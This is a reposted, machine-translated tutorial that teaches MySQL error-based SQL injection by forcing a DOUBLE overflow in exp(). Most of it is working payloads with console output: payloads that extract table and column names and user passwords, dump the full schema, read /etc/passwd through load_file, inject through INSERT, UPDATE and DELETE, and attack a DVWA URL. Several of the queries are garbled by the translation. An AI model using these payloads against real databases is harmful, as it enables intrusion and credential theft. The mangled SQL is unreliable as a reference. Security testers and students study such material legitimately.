Home > Others

Using EXP for SQL error injection

Source: Internet
Author: User
Tags bitwise mathematical functions sql error
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >

0x01 Preface Overview

Good news ~ The author also MySQL found a Double type of data overflow in. If you want to understand the use of overflow to note the data, you can read the author's previous blog post: BIGINT Overflow Error based injections,drops above also has a corresponding translation, see here. When we get MySQL the function in, the author is more interested in the mathematical functions, they should also contain some data types to hold the value. So the author ran to the test to see which functions would have overflow errors. The author then discovers that when a value greater than 709 is passed, 函数exp() an overflow error is raised.

Mysql> Select exp (709); +-----------------------+| EXP (709)              |+-----------------------+| 8.218407461554972e307 |+-----------------------+1 row in Set (0.00 sec) MySQL > select exp (710); ERROR 1690 (22003): DOUBLE value is out of range in ' exp (710) '

In MySQL , exp contrary to ln log the function of and, simply introduced, is log and both return the logarithm of the ln base e, see equation:

Mysql> Select log, +------------------+| Log (|+)          ------------------+| 2.70805020110221 |+------------------+1 row in Set (0.00 sec) mysql> Select ln (15) ;+------------------+| ln (|+)           ------------------+| 2.70805020110221 |+------------------+1 row in Set (0.00 sec)

An exponential function is an inverse function of a logarithmic function, which is a exp() logarithmic function with the base e, such as an equation:

Mysql> Select exp (2.70805020110221); +-----------------------+| Exp (2.70805020110221) |+-----------------------+|                    |+-----------------------+1 Row in Set (0.00 sec)
0x02 Injection

When it comes to injection, we use a negative query to cause " DOUBLE value is out of range " errors. As mentioned by the author's previous blog post, the 0 bitwise inverse will return " 18446744073709551615 ", plus the reason that the function returns 0 after successful execution, we will get the maximum unsigned value for the successfully executed function BIGINT .

Mysql> Select ~0;+----------------------+| ~0                   |+----------------------+| 18446744073709551615 |+----------------------+1 row in Set (0.00 sec) mysql> Select ~ (select version ()); +----------------------+| ~ (select version ())  |+----------------------+| 18446744073709551610 |+----------------------+1 row in set, 1 Warning (0.00 sec)

We use subqueries and bitwise negation, resulting DOUBLE overflow error in one, and thereby injecting data.

> ' exp (~ (Select*from (select User ()) x) '    mysql> Select exp (~ (Select*from (select User ()) x));    ERROR 1690 (22003): DOUBLE value is out of range in ' Exp (((select ' [email protected] ' from dual)) '
0X03 Note out data

Get Table name:

Select exp (~ (SELECT*FROM (select table_name from information_schema.tables where table_schema=database () limit 0,1) x));

Get Column Name:

Select exp (~ (Select*from (select column_name from Information_schema.columns where table_name= ' users ' limit 0,1) x));

Retrieving data:

Select exp (~ (Select*from (': ', ID, username, password) from the users limit 0,1) x));
0x04 overnight

This query can dump all tables and columns from the current context. We can also dump out all of the databases, but since we are extracting them through an error, it will return very few results.

Exp (~ (Select*from (Concat (@:=0, (SELECT COUNT (*) from ' information_schema '. Columns where table_schema=database () [Email Protected]:=concat (@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)), @))) http://localhost/ Dvwa/vulnerabilities/sqli/?id=1 ' or exp (~ (Select*from (select (Concat (@:=0) (SELECT COUNT (*) from ' information_schema ' . columns where table_schema=database () [Email Protected]:=concat (@,0xa,table_schema,0x3a3a,table_name,0x3a3a, column_name))))---&submit=submit#

0x04 Read File

You can load_file() read the file through a function, but the author finds that there are 13 lines of restrictions that the statement can also BIGINT overflow injections use in.

Select exp (~ (Select*from (select Load_file ('/etc/passwd ')));

Note that you cannot write the file because this error is written only in 0.

Mysql> Select exp (~ (select*from (select ' Hello ') a)) into outfile ' c:/out.txt '; ERROR 1690 (22003): DOUBLE value is out of range in ' Exp (((SELECT ' Hello ' from dual)) '    # type C:\out.txt0
0x05 Injection in Insert

Just step by step.

mysql> INSERT into users (ID, username, password) VALUES (2, ' ^ exp (~ (Select*from (select User ()) x)), ' Eyre '); ERROR 1690 (22003): DOUBLE value is out of range in ' Exp (((select ' [email protected] ' from dual)) '

The insert,update delete DIOS same can be used for all and statement queries.

mysql> INSERT into users (ID, username, password) VALUES (2, ' | exp (~ (Select*from (Concat (@:=0, (SELECT COUNT (*) From ' information_schema '. Columns where table_schema=database () [Email Protected]:=concat (@,0xa,table_schema,0x3a3a (Table_name,0x3a3a,column_name)) (@)))) (x)), ' Eyre '); ERROR 1690 (22003): DOUBLE value is out of range in ' exp (~ ((SELECT ' 000newdb::users::idnewdb::users::usernamenewdb::users ::p Assword ' from dual)) '
0x06 Injection in Update 
Mysql> Update users set password= ' Peter ' ^ exp (~ (Select*from (select User ()) x)) where id=4; ERROR 1690 (22003): DOUBLE value is out of range in ' Exp (((select ' [email protected] ' from dual)) '
0x07 Injection in Delete 
Mysql> Delete from users where id= ' 1 ' | Exp (~ (Select*from (select User ()) x)); ERROR 1690 (22003): DOUBLE value is out of range in ' Exp (((select ' [email protected] ' from dual)) '
0X08 Summary

As with the previous bigint injection, exp injection is also available for MySQL5.5.5 and above versions. The previous version was "silent" for this situation.

Mysql> select version (); +---------------------+| Version ()           |+---------------------+| 5.0.45-community-nt |+---------------------+1 row in Set (0.00 sec) mysql> Select exp (710); +----------+| EXP (710) |+----------+|   1. #INF |+----------+1 row in Set (0.00 sec) mysql> Select exp (~0); +---------+| Exp (~0) |+---------+|  1. #INF |+---------+1 row in Set (0.00 sec)

Using EXP for SQL error injection

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Related Keywords:
sql injection error authentication bypass using sql injection login bypass using sql injection hack website using sql injection error based sql injection example sql injection for beginners test site for sql injection

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

What's Trending
Top 10 Tags
datastax versions naming convention zookeeper client class definition md5 microsoft sql server 2005 data structures exception handling error handling
Top 10 Keywords
microsoft download center down wordpress address url site address url wordpress address url windows installer 4 0 download 302 not found web address url definition site address url wordpress db2 integer mac os installation step by step pdf abbreviation for return

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More